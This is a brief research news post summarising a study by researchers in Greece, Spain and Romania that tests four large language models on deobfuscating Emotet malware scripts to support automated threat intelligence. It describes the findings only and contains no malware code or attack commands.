A recent study explores how large language models (LLMs), those kind of artificial intelligence similar to ChatGPT, can be used to automate cyber threat intelligence pipelines, focusing on intelligence from malware samples.
In their work, Constantinos Patsakis, member of the CYMEDSEC project from University of Piraeus (Greece) and his collegues Fran Casino from Universitat Rovira i Virgili (Spain) and Nikolaos Lykousas from Data Centric (Romania) evaluated four prominent LLMs using real-world malicious scripts from the Emotet malware campaign.
Their findings show that although these models are not yet perfectly accurate, they have significant potential in efficiently deobfuscating malware payloads, i.e. the operative parts of a malware. The study also underscores the importance of fine-tuning LLMs for specialized tasks, suggesting that this optimization could lead to future AI-powered threat intelligence systems capable of combating obfuscated malware.
Read the full article here.
Image credits: Igor Omilaev on Unsplash